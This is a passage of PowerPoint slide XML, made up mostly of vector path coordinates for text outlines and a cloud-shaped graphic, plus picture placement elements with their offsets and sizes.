                    <a:pt x="611646" y="29603"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="671406" y="29603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="658126" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634977" y="89555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647141" y="89555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671406" y="29603"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="730669" y="27503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="720506" y="27503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712685" y="28184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684523" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683896" y="67697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684553" y="76511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="714928" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715178" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723691" y="106694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="728591" y="106694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733267" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="742165" y="103645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="746524" y="102155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750793" y="100348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750793" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="719693" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="716147" y="95087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709710" y="92919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706932" y="91316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704606" y="89148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="702167" y="86958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700330" y="84257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697469" y="77248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696769" y="73206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696769" y="68577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="752283" y="68577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="752283" y="61713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="752098" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696763" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697215" y="53982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697311" y="52929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699592" y="47961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="707633" y="39967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="713053" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745148" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="744017" y="36422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="738506" y="30484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730669" y="27503"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="750793" y="86529"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="750115" y="86529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="747924" y="88493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="744220" y="90503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733831" y="94613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="728682" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750793" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750793" y="86529"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="745148" y="37958"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="726581" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="731618" y="39787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="738213" y="47058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="739884" y="52206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="739930" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="752098" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751767" y="53982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750217" y="47188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="747633" y="41333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745148" y="37958"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="786680" y="29874"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="774010" y="29874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="774010" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="786680" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="786680" y="51461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="790068" y="48706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="793569" y="46471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800841" y="43016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="804149" y="42248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="821009" y="42248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="821009" y="40735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="786680" y="40735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="786680" y="29874"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="821009" y="42248"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="813059" y="42248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="816628" y="42655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="818645" y="43016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="820332" y="43422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="821009" y="43422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="821009" y="42248"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="817554" y="29874"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="806500" y="29874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="803845" y="30438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="796166" y="33825"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="791717" y="36693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="786680" y="40735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="821009" y="40735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="821009" y="30438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="821153" y="30438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="817554" y="29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5D3B01FA-C59D-B1A9-F647-D6720B1F602F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4817987" y="2649866"/>
              <a:ext cx="1428115" cy="913130"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1428114" h="913129">
                  <a:moveTo>
                    <a:pt x="598609" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="554519" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530778" y="3375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507037" y="10125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496862" y="13500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484992" y="16875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432423" y="45565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390028" y="82692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383245" y="92817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376462" y="101255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369679" y="111381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364592" y="119819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359504" y="129944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352721" y="140070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349330" y="151883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342547" y="172134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339155" y="183947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337459" y="194073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334068" y="217699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334068" y="248076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323893" y="249763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312023" y="251451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301848" y="254826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289978" y="258201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281499" y="263264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271324" y="270014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262845" y="275077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235713" y="308829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222146" y="349331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220451" y="362832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222146" y="369582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222146" y="379708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210276" y="376333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196710" y="372958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183144" y="371270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171273" y="371270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152620" y="372958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103442" y="384771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61048" y="408397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28828" y="442149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6783" y="484339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="514715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="548467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11870" y="594032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37307" y="632847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74614" y="663224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88180" y="673349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103442" y="678412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118704" y="685162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135662" y="688538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152620" y="690225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171273" y="691913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181448" y="691913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193318" y="690225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193318" y="705414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195014" y="715539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195014" y="725665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198406" y="735790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200101" y="744228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206884" y="764479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211972" y="772917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217059" y="783043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242496" y="816795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283194" y="852234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322197" y="874173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366288" y="889361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403595" y="896112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415465" y="897799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427336" y="897799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440902" y="899487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454468" y="897799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468034" y="897799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="495167" y="894424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508733" y="891049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532474" y="884298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546040" y="880923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556215" y="875860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568085" y="869110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="578260" y="864047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="588434" y="857297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="600305" y="850547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="608784" y="843796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="618958" y="837046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627437" y="828608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634220" y="837046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="642699" y="847171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="651178" y="853922"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="661353" y="862360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671528" y="869110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681702" y="877548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693573" y="882611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="707139" y="889361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720705" y="894424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="734271" y="897799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749533" y="902862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780057" y="909612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795319" y="911300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="810581" y="911300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="827539" y="912988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="869934" y="909612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="910632" y="901174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="961506" y="882611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1003900" y="853922"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015770" y="843796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1039511" y="808357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1047990" y="781355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056469" y="783043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1063252" y="784730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092080" y="784730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1102255" y="783043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1114126" y="781355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1124300" y="777980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1134475" y="772917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1151433" y="762792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1158216" y="754354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1166695" y="747603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1173478" y="740853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1178565" y="732415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181957" y="722290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1187044" y="713852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1190436" y="703726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1192131" y="693600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1192131" y="683475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1190436" y="669974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1188740" y="658161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1200610" y="659849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1214176" y="661536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1226047" y="663224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1239613" y="663224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1295574" y="654786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344751" y="634535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1395625" y="590657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1404104" y="575469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1412582" y="561968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1419366" y="546780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1426149" y="513028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1427844" y="496152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1426149" y="479276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1412582" y="432023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1383754" y="389834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344751" y="359457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1329489" y="349331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1312532" y="342581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1295574" y="337518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1276920" y="332455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1239613" y="329080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1227743" y="330768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1215872" y="330768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1204002" y="332455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1192131" y="335831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1192131" y="291953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1190436" y="278452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1188740" y="266639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1185348" y="254826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181957" y="244701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1178565" y="232887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1168390" y="209261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1158216" y="189010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1151433" y="178884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1144650" y="170446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1137866" y="160321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1129388" y="151883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1122604" y="143445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1114126" y="135007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1105647" y="128257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1097168" y="119819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1076818" y="106318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1034424" y="86067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="964897" y="70878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="953027" y="70878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930982" y="72566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="910632" y="74254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="890283" y="81004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="869934" y="86067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="832626" y="102943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="817364" y="114756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800407" y="126569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="783449" y="99568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="773274" y="87754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="763100" y="74254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="739359" y="54003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="725792" y="43877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710530" y="33751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695268" y="27001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681702" y="20251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="664744" y="13500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649482" y="8437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="632525" y="3375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598609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6" name="object 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EC0BE1B-EE49-B57E-A306-9635B57C5FB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1902" y="2671805"/>
              <a:ext cx="1344751" cy="838733"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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DB0AD44D-5810-57E3-51A5-67564F8F549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7812" y="2640838"/>
              <a:ext cx="1448235" cy="932180"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="28" name="object 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC1CB7FD-0A53-82D9-BA15-A39C708A9C0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8676" y="3369681"/>
              <a:ext cx="777488" cy="677422"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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861CA443-8775-0B51-6BAB-9E92266217C2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="950776" y="4081020"/>
              <a:ext cx="724535" cy="107314"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="724535" h="107314">
                  <a:moveTo>
                    <a:pt x="18212" y="4516"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12478" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12478" y="18403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24864" y="18403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18212" y="4516"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="724535" h="107314">
                  <a:moveTo>
                    <a:pt x="89452" y="18403"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="76082" y="18403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76082" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89452" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89452" y="18403"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="724535" h="107314">
                  <a:moveTo>
                    <a:pt x="24864" y="18403"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12478" y="18403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40201" y="77271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48160" y="77271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56150" y="60426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44991" y="60426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24864" y="18403"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="724535" h="107314">
                  <a:moveTo>
                    <a:pt x="89452" y="4516"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="70887" y="4516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44991" y="60426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56150" y="60426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76082" y="18403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89452" y="18403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89452" y="4516"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="724535" h="107314">
                  <a:moveTo>
                    <a:pt x="174053" y="38974"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="147360" y="38974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149980" y="39155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155016" y="39877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157184" y="40577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160866" y="42677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162334" y="44167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163327" y="46064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164344" y="47938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164863" y="50332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164863" y="55164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157478" y="55526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150567" y="56068"/>
